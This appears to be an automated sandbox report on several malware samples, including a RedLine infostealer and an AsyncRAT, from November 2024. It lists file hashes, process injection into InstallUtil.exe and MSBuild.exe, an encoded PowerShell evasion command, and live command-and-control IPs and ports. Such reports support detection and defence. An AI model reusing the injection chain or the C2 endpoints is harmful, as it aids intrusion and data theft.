SHA512 9ac94880684933ba3407cdc135abc3047543436567af14cd9269c4adc5a6535db7b867d6de0d6238a21b94e69f9890dbb5739155871a624520623a7e56872159

memory/4524-48-0x00000000049F0000-0x0000000004A0A000-memory.dmp

memory/4524-47-0x0000000000260000-0x000000000026C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Google Update.exe.log

MD5 f7a49804289daba7de5b3b77408276f7
SHA1 43dc40ddb1d6e081d52671a56ecefbcb4545e32c
SHA256 6b79cf98a0976e2e43f4e9fae56b57910360503435ff027b87e481d5c3b68892
SHA512 4e0dd3d97bb9cab135c649fac821c9664cad91f4e22fa883b426e20620affce41878981c7f20a3d859027a890304886c186e463ea0df17a184562ee6a1e48d64

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

175s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3856 set thread context of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3856 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp

Files

memory/3856-0-0x000000007518E000-0x000000007518F000-memory.dmp

memory/3856-1-0x0000000000050000-0x0000000001050000-memory.dmp

memory/3856-2-0x0000000017BF0000-0x0000000018194000-memory.dmp

memory/3856-3-0x0000000017640000-0x00000000176D2000-memory.dmp

memory/3856-4-0x00000000175E0000-0x00000000175EA000-memory.dmp

memory/3856-5-0x0000000075180000-0x0000000075930000-memory.dmp

memory/3856-6-0x00000000179A0000-0x0000000017A48000-memory.dmp

memory/3856-7-0x0000000017880000-0x0000000017892000-memory.dmp

memory/3856-8-0x0000000017AA0000-0x0000000017AC2000-memory.dmp

memory/3856-9-0x00000000181A0000-0x00000000184F4000-memory.dmp

memory/1156-10-0x0000000003100000-0x0000000003136000-memory.dmp

memory/1156-11-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1156-12-0x0000000005890000-0x0000000005EB8000-memory.dmp

memory/1156-13-0x0000000005F30000-0x0000000005F96000-memory.dmp

memory/1156-14-0x0000000006090000-0x00000000060F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rzfxvuzy.f3h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1156-24-0x00000000066E0000-0x00000000066FE000-memory.dmp

memory/1156-25-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/1156-26-0x0000000007E10000-0x000000000848A000-memory.dmp

memory/1156-27-0x0000000006B50000-0x0000000006B6A000-memory.dmp

memory/3856-28-0x000000007518E000-0x000000007518F000-memory.dmp

memory/3856-29-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1156-30-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1156-34-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-35-0x0000000000400000-0x0000000000446000-memory.dmp

memory/3856-38-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-37-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-40-0x0000000005110000-0x0000000005122000-memory.dmp

memory/4764-39-0x00000000056B0000-0x0000000005CC8000-memory.dmp

memory/4764-41-0x0000000005240000-0x000000000534A000-memory.dmp

memory/4764-42-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-43-0x0000000005170000-0x00000000051AC000-memory.dmp

memory/4764-44-0x00000000051B0000-0x00000000051FC000-memory.dmp

memory/4764-45-0x0000000075180000-0x0000000075930000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

142s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx" /o ""

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 169.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/1872-5-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-4-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-9-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-8-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-7-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-6-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-10-0x00007FFA15970000-0x00007FFA15980000-memory.dmp

memory/1872-3-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-14-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-16-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-20-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-21-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-19-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-18-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-17-0x00007FFA15970000-0x00007FFA15980000-memory.dmp

memory/1872-15-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-13-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-12-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-11-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-2-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-0-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-1-0x00007FFA579ED000-0x00007FFA579EE000-memory.dmp

memory/1872-44-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-43-0x00007FFA579ED000-0x00007FFA579EE000-memory.dmp

memory/1872-45-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-46-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 47acc722be0bdea7a2933ee72e7a541e
SHA1 d6ef468d0e66cd9b77962584ece564a08b1651a0
SHA256 e6846bba6c3d438cbea2b267d95c1d43fc0f09ccf82c2b2d0fe536096179ef5f
SHA512 91d29bd7ec7731095c0cf691f749c9e1d8fd39b0c0d2d1c249966c94662be6cc6359d63df951c0b359165b30cd5ecc22eb4a3a9249094a0266267522da7dbb73

C:\Users\Admin\AppData\Local\Temp\TCD2173.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

134s

Max time network

155s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/4556-0-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-1-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-3-0x00007FFD5E3CD000-0x00007FFD5E3CE000-memory.dmp

memory/4556-2-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-4-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-5-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-6-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-7-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-8-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-10-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-9-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-11-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-13-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-12-0x00007FFD1C0E0000-0x00007FFD1C0F0000-memory.dmp

memory/4556-14-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-15-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-16-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-18-0x00007FFD1C0E0000-0x00007FFD1C0F0000-memory.dmp

memory/4556-19-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-17-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-45-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-46-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-47-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-53-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-54-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

167s

Command Line

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1856 set thread context of 4472 N/A C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp

Files

memory/1856-0-0x0000000074CBE000-0x0000000074CBF000-memory.dmp

memory/1856-1-0x0000000000DC0000-0x0000000000E68000-memory.dmp

memory/1856-2-0x0000000003100000-0x000000000310C000-memory.dmp

memory/1856-3-0x0000000005780000-0x0000000005788000-memory.dmp

memory/4472-5-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1856-7-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-8-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-9-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-10-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/1856-11-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-12-0x0000000074CB0000-0x0000000075460000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240729-en

Max time kernel

130s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1308 set thread context of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

C:\Users\Admin\AppData\Local\Temp\powershell.exe

"C:\Users\Admin\AppData\Local\Temp\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Network

Country Destination Domain Proto
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp

Files

memory/1308-0-0x000000007444E000-0x000000007444F000-memory.dmp

memory/1308-1-0x0000000000F90000-0x0000000001F90000-memory.dmp

memory/1308-2-0x0000000017350000-0x00000000173F8000-memory.dmp

memory/1308-3-0x0000000074440000-0x0000000074B2E000-memory.dmp

memory/1308-4-0x00000000003D0000-0x00000000003E2000-memory.dmp

memory/944-5-0x0000000000400000-0x0000000000446000-memory.dmp

memory/944-15-0x0000000000400000-0x0000000000446000-memory.dmp

memory/944-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/944-11-0x0000000000400000-0x0000000000446000-memory.dmp

memory/944-9-0x0000000000400000-0x0000000000446000-memory.dmp

memory/944-7-0x0000000000400000-0x0000000000446000-memory.dmp

memory/944-17-0x0000000000400000-0x0000000000446000-memory.dmp

memory/944-21-0x0000000074440000-0x0000000074B2E000-memory.dmp

memory/944-20-0x0000000000400000-0x0000000000446000-memory.dmp

memory/1308-22-0x0000000074440000-0x0000000074B2E000-memory.dmp

memory/944-23-0x0000000074440000-0x0000000074B2E000-memory.dmp

memory/944-24-0x0000000074440000-0x0000000074B2E000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

36s

Max time network

38s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe N/A
